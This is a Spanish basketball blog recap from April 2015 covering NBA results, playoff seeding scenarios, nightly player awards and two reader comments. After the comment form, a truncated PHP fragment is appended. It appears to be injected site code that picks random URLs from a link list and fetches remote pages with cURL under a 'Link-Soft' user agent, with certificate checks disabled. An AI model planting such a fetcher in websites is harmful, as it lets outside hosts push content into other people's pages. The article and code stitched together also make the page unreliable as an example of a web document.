La Crónica: Solo puede quedar uno

14 de April de 2015 por MagicJohnson32

Nada menos que una docena de partidos se disputaron anoche en la antepenúltima madrugada de la regular season 2014-2015. Tantas cosas había en juego y tantas sigue habiendo que hoy la crónica presentará un formato un tanto diferente, a ver si así echamos un poco de luz sobre las incógnitas aún pendientes antes del arranque de los Playoffs.

Al grano.

Por el 8º puesto del Oeste

La liga invalidó nuevamente la técnica que debía dejar a Westbrook fuera de uno de los partidos más decisivos de la temporada, y posiblemente de esa manera hayan cambiado el curso de los acontecimientos. Russ arrasó a Lillard y comandó la victoria de los Thunder (90-101) frente a los Blazers, un resultado que, combinado con el triunfo de Pelicans sobre los Wolves (100-88), provoca que ambos lleguen vivos al último partido de regular season. Anthony Davis, Tyreke Evans y Gordon se bastaron ante un rival empeñado en hacerse con el pick 1 del draft, de modo que Pelicans conservan la octava plaza con idéntico balance al de OKC, que es noveno pero al que le resta un compromiso mucho más sencillo. Para asegurarse su participación en los Playoffs, los Pelicans deberán superar a los Spurs; de lo contrario, necesitarán una improbable derrota de los Thunder en Minnesota. Los dos partidos se disputarán el miércoles a partir de las 2h00 (hora peninsular).

Por el 2º del Oeste

La incógnita más difícil de desentrañar de cuantas quedan en la regular season es cómo se ordenarán finalmente los equipos del 2º al 6º puesto del Oeste. Con las victorias de Rockets (100-90 frente a Hornets) y Clippers (103-110 sobre Nuggets), ambos se hallan en un triple empate con los Spurs. Y el empate podría haber sido cuádruple si los Grizzlies hubiesen completado su remontada en Oakland, donde finalmente prevaleció la noche dulce de Klay Thompson (107-111). Memphis cae un partido por detrás de Spurs, Clippers y Rockets, que llegarán en ese orden a la jornada final. Spurs, como ya hemos comentado, jugará su último encuentro ante Pelicans, mientras los Clippers juegan esta próxima madrugada en Phoenix, los Rockets lo harán el miércoles ante Utah Jazz y los Grizzlies jugarán contra Pacers pendientes de algún pinchazo de los de arriba

Si todo quedase igual, los emparejamientos de primera ronda en el Oeste serían:

1 Warriors vs 8 Pelicans

4 Blazers vs 5 Rockets (ventaja campo Rockets)

2 Spurs vs 7 Mavs

3 Clippers vs 6 Grizzlies

Por el 7º y 8º del Este

Aquí también hay miga. Los Nets tenían la oportunidad de descabalgar a los Heat de la carrera por la octava posición. Para ello debían ganar a los Bulls, pero Gasol & Mirotic arrasaron el Barclays Center de Brooklyn (113-86, de paso se aseguraron ventaja de campo en primera ronda) y Miami cumplió ante los Orlando Magic (93-100). Así que la situación es la siguiente:

7º Celtics 38-42 (juega martes vs Raptors y miércoles at Milwaukee)

8º Pacers 37-43 (martes vs Wizards y miércoles at Memphis)

9º Nets 37-44 (miércoles vs Magic)

10º Heat 36-45 (miércoles at Philadelphia)

La combinación más complicada sería la que llevaría a los Heat a los Playoffs, así que es la que explicaremos. A Miami no le basta, obviamente, con ganar a los Sixers, sino que además necesitan que Pacers y Nets pierdan sus partidos.

Si la clasificación entre los 8 primeros del Este quedase como está hoy, los emparejamientos de primera ronda serían:

1 Hawks vs 8 Pacers

4 Raptors vs 5 Wizards

2 Cavaliers vs 7 Celtics

3 Bulls vs 6 Bucks

Resto de la jornada

Los Knicks ganaron en Atlanta (112-108) y no es un error de imprenta. En Minnesota seguro que lo celebran, ya que el resultado les deja en solitario como el peor equipo de la liga y les acerca a la primera elección del draft. En Cleveland, los Cavs remontaron el paso tras las dos sospechosas derrotas frente a Boston y despacharon a Detroit (97-109) con triple doble de LeBron. Los Bucks le dieron a Michael Carter-Williams un revenge game contra los Sixers (107-97), los Lakers se acercan a una sola derrota de la peor temporada en la historia de la franquicia tras caer en Sacramento (92-102) y los Mavs descansaron a algunos de sus mejores hombres y cayeron con claridad en Utah (92-109).

PREMIOS

MVP: Ayer volvió a entrar Klay Thompson en uno de esos trances, unos minutos en los que parece que podría tirar de espaldas o con los ojos vendados y la metería igual. 15 de 20 en tiros de campo, 8 de 10 en triples, para 42 puntos en apenas 30 minutos de juego, en los que además contribuyó con 5 rebotes y 3 asistencias. ¿Hemos dicho que lo hizo ante la feroz defensa de los Grizzlies?

Rookie: Se ha ganado Jordan Clarkson un sitio en el mejor quinteto rookie haciendo algo habitual de actuaciones como la de anoche. 23 puntos, 6 asistencias, 5 rebotes y 5 recuperaciones para ¿el base de futuro de los Lakers?

Sorpresa: El novato de los Jazz Bryce Cotton apenas había aparecido sobre el parquet en toda la temporada, pero anoche dispuso de minutos y vaya si los aprovechó. 21 puntos con 8 de 15 en tiros, además de 4 asistencias, 2 rebotes y 1 robo.

Decepción: Empezó de manera muy ilusionante el proyecto de estos Hornets 2014-2015 pero ha acabado con una rotunda decepción que anoche vivió otro capítulo más, Señalaremos en esta ocasión a Kemba Walker y Gerald Henderson, que se combinaron para fallar 17 de sus 20 tiros de campo y anotar únicamente 6 puntos.

Mayor esfuerzo en vano: Démosle este galardón hoy a Russ Smith y Jordan Adams (“¿quiénes?”, os preguntaréis algunos), que fueron los mejores de los Grizzlies en la derrota en Oakland y fueron responsables de un parcial 41-18 en el último cuarto que cerca estuvo de provocar una de las mayores remontadas de la historia de la liga.

Top 10

Imágenes | AP Photos / Getty Images

Comenta

2 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    El mate de Cotton es la hostia,con perdón.También es la hostia lo de NYK,pero por otros motivos,y no porque hayan ganado a Atlanta.Los reyes del tanking de este año ahí a la par con Minnesota, a ver si Lakers y 76ers les adelantan en el draft,que se lo merecen.

    Complicado lo de Indiana,con Washington y Memphis como rivales,tiene que ganar ambos si Nets gana su duelo a Orlando,algo que parece previsible.Bastante trágica será la manera de caer de los Pelicans si palman con los Spurs,de todas formas confío en que no van a fallar,que es lo que todo el mundo espera,y si se meten ojo que es un chute de moral considerable para vérselas con los Warriors.

      Citar

  2. Futurman dice:
    #2

    Soy yo, o Lebrón es el mejor pasador de la competición. ¿Hay alguien con su visión de pase?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>